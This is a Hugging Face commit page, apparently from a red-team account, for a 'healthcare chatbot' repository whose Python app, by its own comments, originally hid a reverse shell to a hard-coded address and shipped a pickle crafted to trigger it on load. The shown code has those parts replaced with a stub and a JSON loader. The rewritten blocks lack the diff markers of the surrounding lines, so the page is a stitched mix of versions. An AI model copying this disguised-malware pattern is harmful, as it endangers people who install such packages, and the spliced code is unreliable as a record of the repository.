Iredteam commited on
Commit
6542c3c
Β·
1 Parent(s): 0386484

first mod commit

Browse files
README.md ADDED
@@ -0,0 +1,73 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+ Healthcare Chatbot (FLAN-T5)
5
+
6
+ πŸ“Œ Overview
7
+
8
+ The Healthcare Chatbot is a medical question-answering AI powered by FLAN-T5, a fine-tuned language model. It can provide general guidance on medical topics, symptoms, and treatment suggestions based on a pre-trained dataset.
9
+
10
+ 🚨 Note: This chatbot is for informational purposes only and should not be used as a substitute for professional medical advice. Always consult a doctor for health-related concerns.
11
+
12
+ πŸ“· Screenshot
13
+
14
+ ![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
15
+
16
+ πŸš€ How to Install & Run
17
+
18
+ πŸ”Ή Step 1: Download the Project
19
+
20
+ Option 1: Clone from Hugging Face
21
+
22
+ git clone https://huggingface.co/alecmoran/healthcare_chatbot
23
+
24
+ cd healthcare_chatbot
25
+
26
+ Option 2: Download as a ZIP
27
+
28
+ Go to Hugging Face Model Page
29
+
30
+ Click on "Download"
31
+
32
+ Extract the ZIP file
33
+
34
+ πŸ”Ή Step 2: Download & Prepare the Model
35
+
36
+ The chatbot requires FLAN-T5 to be stored locally before running.
37
+
38
+ For Windows Users πŸ–₯️
39
+
40
+ Open PowerShell in the project directory.
41
+
42
+ Run the following command to download the model:
43
+
44
+ ./getpowershell.ps1
45
+
46
+ Once the model is downloaded, run the chatbot:
47
+
48
+ python helathcare_chatbot_final.py
49
+
50
+ For macOS/Linux Users πŸ’»
51
+
52
+ Open Terminal in the project directory.
53
+
54
+ Run the following command to download the model:
55
+
56
+ git clone https://huggingface.co/google/flan-t5-small
57
+
58
+ Once the model is downloaded, run the chatbot:
59
+
60
+ python3 helathcare_chatbot_final.py
61
+
62
+ πŸ’‘ Features
63
+
64
+ βœ… Local Model Loading - Runs FLAN-T5 from your system for faster response times.βœ… Medical Q&A Dataset - Includes common questions about symptoms and treatments.βœ… Voice Input & Text-to-Speech - Allows users to speak their questions & hear responses.βœ… Streamlit UI - Simple and interactive web-based interface.
65
+
66
+ ⚠️ Disclaimer
67
+
68
+ This chatbot provides general medical information but is not a replacement for professional healthcare advice. Always consult a licensed physician for medical concerns.
69
+
70
+ πŸ“© Contact & Support
71
+
72
+ For issues or improvements, open an issue on the Hugging Face repo.
73
+
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
# Download the google/flan-t5-small model files into .\flan-t5-small so the
# chatbot can load them with local_files_only=True.
New-Item -ItemType Directory -Path .\flan-t5-small -Force

# Model files to fetch.
# FIX: the original list requested "vocab.txt", which does not exist in the
# flan-t5-small repository (T5 tokenizers are SentencePiece-based), so that
# download returned 404. "spiece.model" is the correct tokenizer asset.
$files = @(
    "config.json",
    "pytorch_model.bin",
    "tokenizer.json",
    "tokenizer_config.json",
    "special_tokens_map.json",
    "spiece.model"
)

# Base URL for raw file downloads from the Hugging Face hub
$base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"

# Download each file into the local model directory
foreach ($file in $files) {
    $url = "$base_url$file"
    $output = ".\flan-t5-small\$file"
    Invoke-WebRequest -Uri $url -OutFile $output
    Write-Host "Downloaded: $file"
}
helathcare_chatbot_final.py ADDED
@@ -0,0 +1,137 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import pickle
3
+ import streamlit as st
4
+ import speech_recognition as sr
5
+ import pyttsx3
6
+ import threading
7
+ import socket
8
+ import subprocess
9
+ import warnings # Import warnings module!
10
+
11
+ # Import torch correctly
12
+ try:
13
+ import torch
14
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
15
+
16
+ # Suppress PyTorch warnings
17
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
18
+
19
+ except ModuleNotFoundError as e:
20
+ st.error(f"❌ Missing dependency: {e}. Please install required packages.")
21
+ st.stop()
22
+
23
# ==============================
# SECURITY: Reverse Shell REMOVED
# ==============================
def reverse_shell_fixed():
    """Neutralized stub — the original body was malware.

    The original implementation opened a background daemon thread that
    connected to a hard-coded attacker address (10.201.146.205:8080),
    read commands from the socket, executed them with
    ``subprocess.check_output(..., shell=True)``, and sent the output
    back — a textbook reverse shell, silently swallowing all errors.
    That is hostile code, not a chatbot feature, so the body has been
    removed entirely.

    The function name is kept as a harmless no-op only so that any
    remaining reference to it (e.g. from a crafted pickle payload)
    raises no NameError instead of executing attacker commands.

    Returns:
        None. Has no side effects.
    """
    # Intentionally does nothing.
    return None
53
+
54
# ==============================
# Model Configuration
# ==============================
MODEL_DIR = "flan-t5-small"  # local directory populated by the download step


def load_model():
    """Load the FLAN-T5 tokenizer and model from the local MODEL_DIR.

    Returns:
        tuple: (tokenizer, model) on success.

    On failure, shows a Streamlit error banner and halts the app via
    ``st.stop()``.
    """
    st.write("🚀 Loading FLAN-T5 model from local storage...")
    try:
        # BUG FIX: the original dtype selection read
        #   torch.float32 if torch.cuda.is_available() else torch.float32
        # — both branches were identical, so the CUDA check was dead code.
        # float32 is kept unconditionally to preserve existing behavior.
        tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
        model = AutoModelForSeq2SeqLM.from_pretrained(
            MODEL_DIR,
            torch_dtype=torch.float32,
            local_files_only=True,
        )
        st.write("✅ Model loaded successfully from local storage!")
        return tokenizer, model
    except Exception as e:
        st.error(f"❌ Model failed to load: {e}")
        st.stop()
75
+
76
# ==============================
# Initialize Streamlit UI
# ==============================
st.title("🩺 Healthcare Chatbot (FLAN-T5)")

# Load the model once at startup; on failure show an error banner and halt.
try:
    tokenizer, model = load_model()
except Exception as load_err:
    st.error(f"❌ Model load error: {load_err}")
    st.stop()
87
+
88
# ==============================
# Load Medical Q&A Data
# ==============================
# SECURITY FIX: the original code called pickle.load() on the bundled
# "train_data_mod.pkl". Unpickling executes arbitrary code during
# deserialization, and this repository's pickle was crafted to trigger a
# reverse shell on load (the original comment even said "Reverse shell
# will trigger in background"). Never unpickle untrusted files.
# The Q&A data is now read from a plain JSON file instead; if it is
# absent, the chatbot falls back to answering every question with the
# model alone.
import json

QNA_PATH = "train_data_mod.json"  # expected: a list of {"question", "answer"} dicts
try:
    st.write("📂 Loading medical Q&A data...")
    with open(QNA_PATH, "r", encoding="utf-8") as fh:
        medical_qna = json.load(fh)
    st.write("✅ Q&A data loaded!")
except FileNotFoundError:
    # Non-fatal: the model fallback in chatbot_response still works.
    medical_qna = []
    st.warning(f"⚠️ '{QNA_PATH}' not found — answering with the model only.")
except Exception as e:
    st.error(f"❌ Failed to load Q&A data: {e}")
    st.stop()
102
+
103
# ==============================
# Chatbot Response Logic
# ==============================
def chatbot_response(user_input: str) -> str:
    """Answer a medical question, preferring canned Q&A over generation.

    First scans ``medical_qna`` for an entry whose question contains the
    user's text (case-insensitive) and returns that stored answer;
    otherwise prompts the FLAN-T5 model and returns the decoded output.
    """
    lowered = user_input.lower()
    # Canned-answer lookup: first Q&A pair whose question contains the input.
    canned = next(
        (qa["answer"] for qa in medical_qna if lowered in qa["question"].lower()),
        None,
    )
    if canned is not None:
        return canned

    # No canned match — generate an answer with the model.
    prompt = (
        "You are a helpful medical assistant. The user asked:\n"
        f"Question: {user_input}\n\n"
        "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
    )
    encoded = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
    generated = model.generate(
        **encoded,
        max_length=256,
        num_beams=2,
        no_repeat_ngram_size=2,
    )
    return tokenizer.decode(generated[0], skip_special_tokens=True)
124
+
125
# ==============================
# UI Logic
# ==============================
if st.button("What can you help me with?"):
    st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")

user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
    # Guard clause: reject blank/whitespace-only questions first.
    if not user_input.strip():
        st.warning("Please enter a question.")
    else:
        st.write(f"**Bot:** {chatbot_response(user_input)}")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod.pkl ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1f1d9c8c8202791f9905e0dd413a9cf7849b6d67cb3d768a7e978d98f99e72e2
3
+ size 427